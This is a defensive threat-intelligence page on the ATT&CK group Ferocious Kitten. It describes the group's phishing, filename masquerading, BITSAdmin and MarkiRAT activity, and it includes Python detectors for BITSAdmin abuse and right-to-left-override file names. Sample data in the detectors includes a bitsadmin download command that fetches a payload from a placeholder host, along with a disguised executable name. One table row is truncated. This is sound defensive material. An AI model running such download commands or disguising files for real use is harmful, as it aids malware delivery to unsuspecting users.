G0137: Ferocious Kitten
Ferocious Kitten is a threat group that has primarily targeted Persian-speaking individuals in Iran since at least 2015.[1]
Analyst context for executives and security teams
Ferocious Kitten is an ATT&CK group entry describing activity primarily targeting Persian-speaking individuals in Iran since at least 2015. The practical concern for defenders is targeted social engineering: the related ATT&CK context points to spearphishing attachments, malicious files, filename/resource masquerading, acquired domains, and use of tools including BITSAdmin and MarkiRAT. For leaders, this is a reminder that targeted intrusion readiness depends on email controls, endpoint visibility, user-reporting paths, and incident response playbooks—not just perimeter blocking.
Executive priority
Prioritize this as a targeted-phishing and endpoint-compromise readiness issue where the organization has relevant exposure to the described victimology or similar high-risk users. Ask whether security teams can prove they collect and retain evidence for malicious attachments, suspicious filenames, BITSAdmin/BITS job activity, RAT-like endpoint behavior, and domain-based infrastructure. This object is also useful for audit and compliance discussions because it maps executive risk questions to concrete evidence: email filtering decisions, endpoint logs, user execution events, and response procedures.
Technical view
MITRE provides no official detection text for this group, so SOC validation should be built from the related software and techniques. Validate visibility for T1566.001 Spearphishing Attachment and T1204.002 Malicious File across mail gateways, endpoint controls, and user execution telemetry. Review controls and detections for T1036.002 Right-to-Left Override and T1036.005 Match Legitimate Resource Name or Location, especially file names, paths, and misleading extensions. Because the relationship set includes S0190 BITSAdmin on Windows, confirm monitoring for unusual BITSAdmin execution and BITS job creation. Because S0652 MarkiRAT is listed as used by Ferocious Kitten, ensure malware/RAT triage procedures can preserve host, process, file, and network evidence without assuming a single indicator set.
Likely telemetry
- Email security logs for attachments, sender metadata, delivery disposition, and user interaction
- Endpoint process creation and command-line telemetry, especially for BITSAdmin where Windows telemetry is available
- File creation, rename, path, extension, and Unicode filename metadata for RTLO or masquerading patterns
- Endpoint detection or antivirus alerts for suspicious files and RAT-like behavior
- DNS, proxy, and network connection logs for domain-based infrastructure identified during investigations
Detection direction
- Do not rely on a group-level signature; ATT&CK supplies no official detection guidance for this intrusion set.
- Tune phishing detections for attachment-driven delivery and user execution while accounting for legitimate business documents to reduce false positives.
- Add or validate analytics for right-to-left override characters, misleading extensions, and files placed or named to resemble legitimate resources.
- Monitor BITSAdmin/BITS job activity for unusual parent processes, destinations, timing, or user context, recognizing that BITSAdmin can have legitimate administrative use.
- Use domain, DNS, proxy, and endpoint context together; acquired domains alone are not sufficient for high-confidence detection.
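One way to operationalize the BITSAdmin bullet above is to score each bitsadmin.exe process-creation event on the combination of signals the list calls out (parent process, download destination, drop path, user context, timing) rather than alerting on the binary alone. The script below is an added example written for this page, not code from Glexia, Kaspersky, or MITRE. The field names mirror Sysmon Event ID 1, and the allowlist, the `adm-` naming convention, the business-hours window, and the sample events are all assumptions constructed for the example.

```python
# Added example (not code from the page, Kaspersky, or MITRE): score
# bitsadmin.exe process-creation events for the anomalies listed above:
# unusual parent, external download destination, user context and timing.
# Field names mirror Sysmon Event ID 1; the events and the allowlist are
# constructed for this example and are not real telemetry.
import re
from datetime import datetime

# Parents that have no business spawning bitsadmin: the Office, mail and script
# hosts that would have opened a spearphishing attachment (T1566.001 / T1204.002).
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                      "acrord32.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Assumption: an ops team maintains an allowlist of internal BITS sources.
ALLOWED_DESTINATIONS = {"updates.corp.example", "sccm.corp.example"}
# Assumption: administrative work happens from 'adm-' accounts during these local hours.
ADMIN_PREFIX = "corp\\adm-"
BUSINESS_HOURS = range(7, 20)

URL_RE = re.compile(r"https?://([^/\s]+)", re.IGNORECASE)
DROP_PATH_RE = re.compile(r"\\(users|programdata|temp|appdata)\\")


def basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def score_event(evt: dict) -> dict:
    """Return {'score', 'reasons'} for one process-creation event.

    Expected keys: Image, CommandLine, ParentImage, User, UtcTime ('YYYY-MM-DD HH:MM:SS').
    Non-bitsadmin events score 0 so the function can run over a whole log.
    """
    if basename(evt.get("Image", "")) != "bitsadmin.exe":
        return {"score": 0, "reasons": []}

    cmd = evt.get("CommandLine", "")
    cmd_l = cmd.lower()
    score, reasons = 0, []

    # Download-capable verbs: /transfer fetches in one shot, /addfile stages a job.
    if re.search(r"/(transfer|addfile)\b", cmd_l):
        score += 2
        reasons.append("download_verb")
    for host in URL_RE.findall(cmd):
        if host.lower() not in ALLOWED_DESTINATIONS:
            score += 3
            reasons.append(f"external_destination:{host}")
    # /SetNotifyCmdLine runs a command when the job completes: download-then-execute.
    if "/setnotifycmdline" in cmd_l:
        score += 3
        reasons.append("notify_cmdline_execution")
    if DROP_PATH_RE.search(cmd_l):
        score += 1
        reasons.append("user_writable_drop_path")

    parent = basename(evt.get("ParentImage", ""))
    if parent in SUSPICIOUS_PARENTS:
        score += 4
        reasons.append(f"suspicious_parent:{parent}")

    if datetime.fromisoformat(evt["UtcTime"]).hour not in BUSINESS_HOURS:
        score += 1
        reasons.append("outside_business_hours")

    user = evt.get("User", "")
    is_service = user.upper().endswith(("SYSTEM", "$"))  # machine or SYSTEM accounts
    if not is_service and not user.lower().startswith(ADMIN_PREFIX):
        score += 1
        reasons.append("interactive_non_admin_user")
    return {"score": score, "reasons": reasons}


def triage(events, threshold=5):
    """Return (UtcTime, verdict) for events scoring at or above threshold."""
    hits = []
    for evt in events:
        verdict = score_event(evt)
        if verdict["score"] >= threshold:
            hits.append((evt["UtcTime"], verdict))
    return hits


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {   # Word, opened from a mail attachment, spawns bitsadmin to fetch a payload
        "UtcTime": "2021-06-16 21:14:03",
        "Image": "C:\\Windows\\System32\\bitsadmin.exe",
        "CommandLine": "bitsadmin /transfer upd /download /priority high "
                       "http://cdn.example.net/u.dat C:\\Users\\mina\\AppData\\Local\\Temp\\u.exe",
        "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
        "User": "CORP\\mina",
    },
    {   # Routine patch staging: admin account, internal source, business hours
        "UtcTime": "2021-06-17 09:02:11",
        "Image": "C:\\Windows\\System32\\bitsadmin.exe",
        "CommandLine": "bitsadmin /transfer patch /download "
                       "https://updates.corp.example/kb.msu C:\\ProgramData\\Patches\\kb.msu",
        "ParentImage": "C:\\Windows\\System32\\cmd.exe",
        "User": "CORP\\adm-ops",
    },
]

if __name__ == "__main__":
    for when, verdict in triage(SAMPLE_EVENTS):
        print(when, verdict["score"], ", ".join(verdict["reasons"]))
```

The weights are deliberately additive so that a legitimate patch job run by an admin from cmd.exe during the day stays under the threshold even though it uses `/transfer`, while the Office-spawned download to a user temp path crosses it on several independent signals. Tune the allowlist and the account convention to the environment before using the scores for alerting.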
Mitigation priorities
- Harden email attachment handling with sandboxing, filtering, and user-reporting workflows appropriate to targeted phishing risk.
- Reduce user-execution risk through endpoint protection, attachment detonation, least privilege, and clear procedures for suspicious files.
- Apply endpoint controls and logging for script/tool abuse and administrative utilities such as BITSAdmin where relevant.
- Improve filename and path inspection for Unicode deception and masquerading patterns rather than depending only on visible file names.
- Maintain incident response playbooks for suspected RAT activity, including host isolation criteria, evidence preservation, and scoping across email and endpoint data.
Analyst notes and limits
The most decision-useful context comes from relationships rather than the group description itself. Ferocious Kitten is linked to phishing-related execution, masquerading, domain acquisition, tool acquisition, BITSAdmin, and MarkiRAT. That makes this object useful for assessing targeted-phishing readiness and endpoint investigation depth, especially for organizations with users or missions relevant to the stated targeting context.
The supplied ATT&CK object does not specify group-level platforms, tactics, labels, or official detection guidance. The related techniques span multiple platforms and the related software carries Windows-specific context, but local applicability must be confirmed from the environment. This analysis does not assert current activity, attribution beyond the ATT&CK group entry, customer exposure, or guaranteed detection coverage.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1204.002 | Malicious File | Ferocious Kitten has attempted to convince victims to enable malicious content within a spearphishing email by including an odd decoy message.[1] |
| Enterprise | T1036.002 | Right-to-Left Override | Ferocious Kitten has used right-to-left override to reverse executables' names to make them appear to have different file extensions, rather than their real ones.[1] |
| Enterprise | T1036.005 | Match Legitimate Resource Name or Location | Ferocious Kitten has named malicious files |
| Enterprise | T1566.001 | Spearphishing Attachment | Ferocious Kitten has conducted spearphishing campaigns containing malicious documents to lure victims to open the attachments.[1] |
| Enterprise | T1588.002 | Tool | Ferocious Kitten has obtained open source tools for its operations, including JsonCPP and Psiphon.[1] |
| Enterprise | T1583.001 | Domains | Ferocious Kitten has acquired domains imitating legitimate sites.[1] |
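The T1036.002 and T1036.005 rows above describe the deception that makes an attachment look like a document: a right-to-left override character reverses the tail of the name so the visible extension differs from the one Windows executes. The following is an added example for this page, not code from Glexia, Kaspersky, or MITRE. It models how a bidi-aware file browser renders a name, recovers the real extension, and also flags the plainer `invoice.pdf.exe` double-extension pattern. The extension lists and the sample file names are constructed for the example and are not indicators from the Ferocious Kitten reporting.

```python
# Added example (not code from the page, Kaspersky, or MITRE): triage file names
# for right-to-left override (T1036.002) and extension masquerading (T1036.005).
# The sample names below are constructed for illustration and are not
# indicators from the Ferocious Kitten reporting.

RLO = "\u202e"  # RIGHT-TO-LEFT OVERRIDE
PDF = "\u202c"  # POP DIRECTIONAL FORMATTING, ends an override
# Unicode bidi controls; none belongs in the name of a mail attachment.
BIDI_CONTROLS = {"\u202a", "\u202b", "\u202c", "\u202d", "\u202e",
                 "\u2066", "\u2067", "\u2068", "\u2069", "\u200e", "\u200f"}

EXECUTABLE_EXTENSIONS = {"exe", "scr", "com", "pif", "bat", "cmd", "js", "jse",
                         "vbs", "vbe", "hta", "lnk", "msi", "ps1", "cpl"}
DOCUMENT_EXTENSIONS = {"pdf", "doc", "docx", "xls", "xlsx", "ppt", "pptx",
                       "txt", "jpg", "jpeg", "png", "rtf"}


def strip_bidi(name: str) -> str:
    """Remove bidi control characters; what is left is the name the OS acts on."""
    return "".join(c for c in name if c not in BIDI_CONTROLS)


def rendered_name(name: str) -> str:
    """Approximate how a bidi-aware file browser draws `name`.

    Characters after an RLO are drawn right-to-left until a PDF (or end of
    string), so 'report' + RLO + 'fdp.exe' is displayed as 'reportexe.pdf'.
    This is a simplified model of the bidi algorithm, enough for triage.
    """
    out, i = [], 0
    while i < len(name):
        if name[i] == RLO:
            j = name.find(PDF, i + 1)
            if j == -1:
                j = len(name)
            out.append(name[i + 1:j][::-1])
            i = j + 1
        else:
            out.append(name[i])
            i += 1
    return strip_bidi("".join(out))


def extension(name: str) -> str:
    """Lower-cased text after the last dot, or '' when there is no dot."""
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def assess_filename(name: str) -> dict:
    """Return the displayed name, the real extension and a list of findings."""
    findings = []
    if any(c in BIDI_CONTROLS for c in name):
        findings.append("bidi_control_present")

    shown, real = rendered_name(name), strip_bidi(name)
    shown_ext, real_ext = extension(shown), extension(real)
    # The user sees one extension, the OS executes another.
    if shown_ext != real_ext and real_ext in EXECUTABLE_EXTENSIONS:
        findings.append(f"rtlo_extension_mismatch:shown={shown_ext},real={real_ext}")

    # 'invoice.pdf.exe' style: a document extension immediately before an executable one.
    parts = real.lower().split(".")
    if len(parts) >= 3 and parts[-1] in EXECUTABLE_EXTENSIONS and parts[-2] in DOCUMENT_EXTENSIONS:
        findings.append(f"double_extension:{parts[-2]}.{parts[-1]}")

    return {"name": name, "displayed": shown, "real_extension": real_ext, "findings": findings}


if __name__ == "__main__":
    # Constructed samples: one RTLO-disguised executable, one double extension, one benign document.
    for sample in ("report" + RLO + "fdp.exe", "invoice.pdf.exe", "quarterly_report.docx"):
        print(assess_filename(sample))
```

Run this over attachment names from mail-gateway logs or file-creation events rather than over what an analyst sees in a GUI: the rendered form is exactly what the deception targets, so the check has to start from the raw code points. Any bidi control in an attachment name is worth a finding on its own, even before the extension comparison.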
Groups, software, and campaigns
S0652: MarkiRAT
MarkiRAT is a remote access Trojan (RAT) compiled with Visual Studio that has been used by Ferocious Kitten since at least 2015.[1]
S0190: BITSAdmin
BITSAdmin is a Windows command-line tool used to create and manage Background Intelligent Transfer Service (BITS) jobs; ATT&CK lists it as software used by Ferocious Kitten.
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see the Updates page under ATT&CK resources.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.0 | | Current bundle | 7c42238d3e33… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
[1] Kaspersky Ferocious Kitten Jun 2021: GReAT. (2021, June 16). Ferocious Kitten: 6 Years of Covert Surveillance in Iran. Kaspersky. Retrieved September 22, 2021.
[2] MITRE ATT&CK. G0137: Ferocious Kitten.
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.